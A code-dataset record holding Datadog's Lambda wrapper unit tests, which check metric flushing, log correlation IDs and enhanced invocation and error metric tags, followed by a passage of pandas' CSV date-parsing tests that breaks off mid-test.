f7190276ce7083fff4e92fe7957e9808976cfa88 | 15,748 | py | Python | tests/test_wrapper.py | Neki/datadog-lambda-python | 57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c | [
"Apache-2.0"
] | null | null | null | tests/test_wrapper.py | Neki/datadog-lambda-python | 57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c | [
"Apache-2.0"
] | null | null | null | tests/test_wrapper.py | Neki/datadog-lambda-python | 57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c | [
"Apache-2.0"
] | null | null | null | import os
import unittest
try:
from unittest.mock import patch, call, ANY, MagicMock
except ImportError:
from mock import patch, call, ANY, MagicMock
from datadog_lambda.wrapper import datadog_lambda_wrapper
from datadog_lambda.metric import lambda_metric
from datadog_lambda.thread_stats_writer import ThreadStatsWriter
def get_mock_context(
aws_request_id="request-id-1",
memory_limit_in_mb="256",
invoked_function_arn="arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:1",
function_version="1",
client_context={},
):
lambda_context = MagicMock()
lambda_context.aws_request_id = aws_request_id
lambda_context.memory_limit_in_mb = memory_limit_in_mb
lambda_context.invoked_function_arn = invoked_function_arn
lambda_context.function_version = function_version
lambda_context.client_context = client_context
return lambda_context
class TestDatadogLambdaWrapper(unittest.TestCase):
def setUp(self):
# Force @datadog_lambda_wrapper to always create a real
# (not no-op) wrapper.
datadog_lambda_wrapper._force_wrap = True
patcher = patch(
"datadog.threadstats.reporters.HttpReporter.flush_distributions"
)
self.mock_threadstats_flush_distributions = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.extract_dd_trace_context")
self.mock_extract_dd_trace_context = patcher.start()
self.mock_extract_dd_trace_context.return_value = ({}, None)
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.set_correlation_ids")
self.mock_set_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.inject_correlation_ids")
self.mock_inject_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.patch_all")
self.mock_patch_all = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.cold_start.is_cold_start")
self.mock_is_cold_start = patcher.start()
self.mock_is_cold_start.return_value = True
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.python_version_tuple")
self.mock_python_version_tuple = patcher.start()
self.mock_python_version_tuple.return_value = ("2", "7", "10")
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.metric.write_metric_point_to_stdout")
self.mock_write_metric_point_to_stdout = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.get_library_version_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
# Mock the layer version so we don't have to update tests on every version bump
self.mock_format_dd_lambda_layer_tag.return_value = "datadog_lambda:v6.6.6"
patcher = patch("datadog_lambda.tags._format_dd_lambda_layer_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
# Mock the layer version so we don't have to update tests on every version bump
self.mock_format_dd_lambda_layer_tag.return_value = (
"dd_lambda_layer:datadog-python27_0.1.0"
)
self.addCleanup(patcher.stop)
def test_datadog_lambda_wrapper(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_handler(lambda_event, lambda_context)
self.mock_threadstats_flush_distributions.assert_has_calls(
[
call(
[
{
"metric": "test.metric",
"points": [[ANY, [100]]],
"type": "distribution",
"host": None,
"device": None,
"tags": ANY,
"interval": 10,
}
]
)
]
)
self.mock_extract_dd_trace_context.assert_called_with(
lambda_event, lambda_context, extractor=None
)
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
self.mock_patch_all.assert_called()
def test_datadog_lambda_wrapper_flush_to_log(self):
os.environ["DD_FLUSH_TO_LOG"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_threadstats_flush_distributions.assert_not_called()
del os.environ["DD_FLUSH_TO_LOG"]
def test_datadog_lambda_wrapper_flush_in_thread(self):
# force ThreadStats to flush in thread
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(True)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
# assert flushing in the thread
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
# assert another flushing in the end
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 2)
# reset ThreadStats
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_not_flush_in_thread(self):
# force ThreadStats to not flush in thread
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
# assert no flushing in the thread
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 0)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
# assert flushing in the end
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
# reset ThreadStats
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_inject_correlation_ids(self):
os.environ["DD_LOGS_INJECTION"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
del os.environ["DD_LOGS_INJECTION"]
def test_invocations_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_errors_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.errors",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_cold_start_tag(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_is_cold_start.return_value = False
lambda_handler(
lambda_event, get_mock_context(aws_request_id="second-request-id")
)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:false",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_latest(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_context.invoked_function_arn = (
"arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:$Latest"
)
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:Latest",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_enhanced_metrics_alias(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
# tests wouldn't run because line was too long
alias_arn = "arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:My_alias-1"
lambda_context.invoked_function_arn = alias_arn
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"executedversion:1",
"resource:python-layer-test:My_alias-1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_no_enhanced_metrics_without_env_var(self):
os.environ["DD_ENHANCED_METRICS"] = "false"
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_not_called()
del os.environ["DD_ENHANCED_METRICS"]
def test_only_one_wrapper_in_use(self):
patcher = patch("datadog_lambda.wrapper.submit_invocations_metric")
self.mock_submit_invocations_metric = patcher.start()
self.addCleanup(patcher.stop)
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
# Turn off _force_wrap to emulate the nested wrapper scenario,
# the second @datadog_lambda_wrapper should actually be no-op.
datadog_lambda_wrapper._force_wrap = False
lambda_handler_double_wrapped = datadog_lambda_wrapper(lambda_handler)
lambda_event = {}
lambda_handler_double_wrapped(lambda_event, get_mock_context())
self.mock_patch_all.assert_called_once()
self.mock_submit_invocations_metric.assert_called_once()
| 35.954338 | 97 | 0.573025 | import os
import unittest
try:
from unittest.mock import patch, call, ANY, MagicMock
except ImportError:
from mock import patch, call, ANY, MagicMock
from datadog_lambda.wrapper import datadog_lambda_wrapper
from datadog_lambda.metric import lambda_metric
from datadog_lambda.thread_stats_writer import ThreadStatsWriter
def get_mock_context(
aws_request_id="request-id-1",
memory_limit_in_mb="256",
invoked_function_arn="arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:1",
function_version="1",
client_context={},
):
lambda_context = MagicMock()
lambda_context.aws_request_id = aws_request_id
lambda_context.memory_limit_in_mb = memory_limit_in_mb
lambda_context.invoked_function_arn = invoked_function_arn
lambda_context.function_version = function_version
lambda_context.client_context = client_context
return lambda_context
class TestDatadogLambdaWrapper(unittest.TestCase):
def setUp(self):
datadog_lambda_wrapper._force_wrap = True
patcher = patch(
"datadog.threadstats.reporters.HttpReporter.flush_distributions"
)
self.mock_threadstats_flush_distributions = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.extract_dd_trace_context")
self.mock_extract_dd_trace_context = patcher.start()
self.mock_extract_dd_trace_context.return_value = ({}, None)
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.set_correlation_ids")
self.mock_set_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.inject_correlation_ids")
self.mock_inject_correlation_ids = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.wrapper.patch_all")
self.mock_patch_all = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.cold_start.is_cold_start")
self.mock_is_cold_start = patcher.start()
self.mock_is_cold_start.return_value = True
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.python_version_tuple")
self.mock_python_version_tuple = patcher.start()
self.mock_python_version_tuple.return_value = ("2", "7", "10")
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.metric.write_metric_point_to_stdout")
self.mock_write_metric_point_to_stdout = patcher.start()
self.addCleanup(patcher.stop)
patcher = patch("datadog_lambda.tags.get_library_version_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
self.mock_format_dd_lambda_layer_tag.return_value = "datadog_lambda:v6.6.6"
patcher = patch("datadog_lambda.tags._format_dd_lambda_layer_tag")
self.mock_format_dd_lambda_layer_tag = patcher.start()
# Mock the layer version so we don't have to update tests on every version bump
self.mock_format_dd_lambda_layer_tag.return_value = (
"dd_lambda_layer:datadog-python27_0.1.0"
)
self.addCleanup(patcher.stop)
def test_datadog_lambda_wrapper(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_handler(lambda_event, lambda_context)
self.mock_threadstats_flush_distributions.assert_has_calls(
[
call(
[
{
"metric": "test.metric",
"points": [[ANY, [100]]],
"type": "distribution",
"host": None,
"device": None,
"tags": ANY,
"interval": 10,
}
]
)
]
)
self.mock_extract_dd_trace_context.assert_called_with(
lambda_event, lambda_context, extractor=None
)
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
self.mock_patch_all.assert_called()
def test_datadog_lambda_wrapper_flush_to_log(self):
os.environ["DD_FLUSH_TO_LOG"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_threadstats_flush_distributions.assert_not_called()
del os.environ["DD_FLUSH_TO_LOG"]
def test_datadog_lambda_wrapper_flush_in_thread(self):
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(True)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 2)
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_not_flush_in_thread(self):
import datadog_lambda.metric as metric_module
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
@datadog_lambda_wrapper
def lambda_handler(event, context):
import time
lambda_metric("test.metric", 100)
time.sleep(11)
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 0)
lambda_metric("test.metric", 200)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
metric_module.lambda_stats.stop()
metric_module.lambda_stats = ThreadStatsWriter(False)
def test_datadog_lambda_wrapper_inject_correlation_ids(self):
os.environ["DD_LOGS_INJECTION"] = "True"
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_set_correlation_ids.assert_called()
self.mock_inject_correlation_ids.assert_called()
del os.environ["DD_LOGS_INJECTION"]
def test_invocations_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_errors_metric(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.errors",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_cold_start_tag(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_handler(lambda_event, get_mock_context())
self.mock_is_cold_start.return_value = False
lambda_handler(
lambda_event, get_mock_context(aws_request_id="second-request-id")
)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:1",
"cold_start:false",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
),
]
)
def test_enhanced_metrics_latest(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
lambda_context.invoked_function_arn = (
"arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:$Latest"
)
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"resource:python-layer-test:Latest",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_enhanced_metrics_alias(self):
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
lambda_event = {}
lambda_context = get_mock_context()
alias_arn = "arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:My_alias-1"
lambda_context.invoked_function_arn = alias_arn
lambda_handler(lambda_event, lambda_context)
self.mock_write_metric_point_to_stdout.assert_has_calls(
[
call(
"aws.lambda.enhanced.invocations",
1,
tags=[
"region:us-west-1",
"account_id:123457598159",
"functionname:python-layer-test",
"executedversion:1",
"resource:python-layer-test:My_alias-1",
"cold_start:true",
"memorysize:256",
"runtime:python2.7",
"datadog_lambda:v6.6.6",
"dd_lambda_layer:datadog-python27_0.1.0",
],
timestamp=None,
)
]
)
def test_no_enhanced_metrics_without_env_var(self):
os.environ["DD_ENHANCED_METRICS"] = "false"
@datadog_lambda_wrapper
def lambda_handler(event, context):
raise RuntimeError()
lambda_event = {}
with self.assertRaises(RuntimeError):
lambda_handler(lambda_event, get_mock_context())
self.mock_write_metric_point_to_stdout.assert_not_called()
del os.environ["DD_ENHANCED_METRICS"]
def test_only_one_wrapper_in_use(self):
patcher = patch("datadog_lambda.wrapper.submit_invocations_metric")
self.mock_submit_invocations_metric = patcher.start()
self.addCleanup(patcher.stop)
@datadog_lambda_wrapper
def lambda_handler(event, context):
lambda_metric("test.metric", 100)
# Turn off _force_wrap to emulate the nested wrapper scenario,
# the second @datadog_lambda_wrapper should actually be no-op.
datadog_lambda_wrapper._force_wrap = False
lambda_handler_double_wrapped = datadog_lambda_wrapper(lambda_handler)
lambda_event = {}
lambda_handler_double_wrapped(lambda_event, get_mock_context())
self.mock_patch_all.assert_called_once()
self.mock_submit_invocations_metric.assert_called_once()
| true | true |
f719035a10609454242fe84d548ee0290b6fb04e | 34,201 | py | Python | pandas/tests/io/parser/test_parse_dates.py | sayanmondal2098/pandas | 2f6b90aaaab6814c102eb160c5a9c11bc04a092e | [
"BSD-3-Clause"
] | 1 | 2019-05-19T13:44:03.000Z | 2019-05-19T13:44:03.000Z | pandas/tests/io/parser/test_parse_dates.py | sanjusci/pandas | a1fee9199eba7ebf423880243936b9f1501d3d3a | [
"BSD-3-Clause"
] | null | null | null | pandas/tests/io/parser/test_parse_dates.py | sanjusci/pandas | a1fee9199eba7ebf423880243936b9f1501d3d3a | [
"BSD-3-Clause"
] | 3 | 2018-01-08T08:40:55.000Z | 2019-10-07T02:02:40.000Z | # -*- coding: utf-8 -*-
"""
Tests date parsing functionality for all of the
parsers defined in parsers.py
"""
from datetime import date, datetime
from io import StringIO
import numpy as np
import pytest
import pytz
from pandas._libs.tslib import Timestamp
from pandas._libs.tslibs import parsing
from pandas.compat import lrange, parse_date
from pandas.compat.numpy import np_array_datetime64_compat
import pandas as pd
from pandas import DataFrame, DatetimeIndex, Index, MultiIndex
from pandas.core.indexes.datetimes import date_range
import pandas.util.testing as tm
import pandas.io.date_converters as conv
import pandas.io.parsers as parsers
def test_separator_date_conflict(all_parsers):
# Regression test for gh-4678
#
# Make sure thousands separator and
# date parsing do not conflict.
parser = all_parsers
data = "06-02-2013;13:00;1-000.215"
expected = DataFrame([[datetime(2013, 6, 2, 13, 0, 0), 1000.215]],
columns=["Date", 2])
df = parser.read_csv(StringIO(data), sep=";", thousands="-",
parse_dates={"Date": [0, 1]}, header=None)
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col_custom(all_parsers, keep_date_col):
data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
parser = all_parsers
def date_parser(*date_cols):
"""
Test date parser.
Parameters
----------
date_cols : args
The list of data columns to parse.
Returns
-------
parsed : Series
"""
return parsing.try_parse_dates(parsers._concat_date_cols(date_cols))
result = parser.read_csv(StringIO(data), header=None,
date_parser=date_parser, prefix="X",
parse_dates={"actual": [1, 2],
"nominal": [1, 3]},
keep_date_col=keep_date_col)
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", "19990127", " 19:00:00", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", "19990127", " 20:00:00", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", "19990127", " 21:00:00", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", "19990127", " 21:00:00", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", "19990127", " 22:00:00", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", "19990127", " 23:00:00", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["actual", "nominal", "X0", "X1", "X2",
"X3", "X4", "X5", "X6", "X7", "X8"])
if not keep_date_col:
expected = expected.drop(["X1", "X2", "X3"], axis=1)
elif parser.engine == "python":
expected["X1"] = expected["X1"].astype(np.int64)
# Python can sometimes be flaky about how
# the aggregated columns are entered, so
# this standardizes the order.
result = result[expected.columns]
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("keep_date_col", [True, False])
def test_multiple_date_col(all_parsers, keep_date_col):
data = """\
KORD,19990127, 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127, 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127, 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127, 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127, 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
KORD,19990127, 23:00:00, 22:56:00, -0.5900, 1.7100, 4.6000, 0.0000, 280.0000
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None,
prefix="X", parse_dates=[[1, 2], [1, 3]],
keep_date_col=keep_date_col)
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", "19990127", " 19:00:00", " 18:56:00",
0.81, 2.81, 7.2, 0.0, 280.0],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", "19990127", " 20:00:00", " 19:56:00",
0.01, 2.21, 7.2, 0.0, 260.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", "19990127", " 21:00:00", " 20:56:00",
-0.59, 2.21, 5.7, 0.0, 280.0],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
"KORD", "19990127", " 21:00:00", " 21:18:00",
-0.99, 2.01, 3.6, 0.0, 270.0],
[datetime(1999, 1, 27, 22, 0), datetime(1999, 1, 27, 21, 56),
"KORD", "19990127", " 22:00:00", " 21:56:00",
-0.59, 1.71, 5.1, 0.0, 290.0],
[datetime(1999, 1, 27, 23, 0), datetime(1999, 1, 27, 22, 56),
"KORD", "19990127", " 23:00:00", " 22:56:00",
-0.59, 1.71, 4.6, 0.0, 280.0],
], columns=["X1_X2", "X1_X3", "X0", "X1", "X2",
"X3", "X4", "X5", "X6", "X7", "X8"])
if not keep_date_col:
expected = expected.drop(["X1", "X2", "X3"], axis=1)
elif parser.engine == "python":
expected["X1"] = expected["X1"].astype(np.int64)
tm.assert_frame_equal(result, expected)
def test_date_col_as_index_col(all_parsers):
data = """\
KORD,19990127 19:00:00, 18:56:00, 0.8100, 2.8100, 7.2000, 0.0000, 280.0000
KORD,19990127 20:00:00, 19:56:00, 0.0100, 2.2100, 7.2000, 0.0000, 260.0000
KORD,19990127 21:00:00, 20:56:00, -0.5900, 2.2100, 5.7000, 0.0000, 280.0000
KORD,19990127 21:00:00, 21:18:00, -0.9900, 2.0100, 3.6000, 0.0000, 270.0000
KORD,19990127 22:00:00, 21:56:00, -0.5900, 1.7100, 5.1000, 0.0000, 290.0000
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None, prefix="X",
parse_dates=[1], index_col=1)
index = Index([datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 20, 0),
datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 0),
datetime(1999, 1, 27, 22, 0)], name="X1")
expected = DataFrame([
["KORD", " 18:56:00", 0.81, 2.81, 7.2, 0.0, 280.0],
["KORD", " 19:56:00", 0.01, 2.21, 7.2, 0.0, 260.0],
["KORD", " 20:56:00", -0.59, 2.21, 5.7, 0.0, 280.0],
["KORD", " 21:18:00", -0.99, 2.01, 3.6, 0.0, 270.0],
["KORD", " 21:56:00", -0.59, 1.71, 5.1, 0.0, 290.0],
], columns=["X0", "X2", "X3", "X4", "X5", "X6", "X7"], index=index)
tm.assert_frame_equal(result, expected)
def test_multiple_date_cols_int_cast(all_parsers):
data = ("KORD,19990127, 19:00:00, 18:56:00, 0.8100\n"
"KORD,19990127, 20:00:00, 19:56:00, 0.0100\n"
"KORD,19990127, 21:00:00, 20:56:00, -0.5900\n"
"KORD,19990127, 21:00:00, 21:18:00, -0.9900\n"
"KORD,19990127, 22:00:00, 21:56:00, -0.5900\n"
"KORD,19990127, 23:00:00, 22:56:00, -0.5900")
parse_dates = {"actual": [1, 2], "nominal": [1, 3]}
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None,
date_parser=conv.parse_date_time,
parse_dates=parse_dates, prefix="X")
expected = DataFrame([
[datetime(1999, 1, 27, 19, 0), datetime(1999, 1, 27, 18, 56),
"KORD", 0.81],
[datetime(1999, 1, 27, 20, 0), datetime(1999, 1, 27, 19, 56),
"KORD", 0.01],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 20, 56),
"KORD", -0.59],
[datetime(1999, 1, 27, 21, 0), datetime(1999, 1, 27, 21, 18),
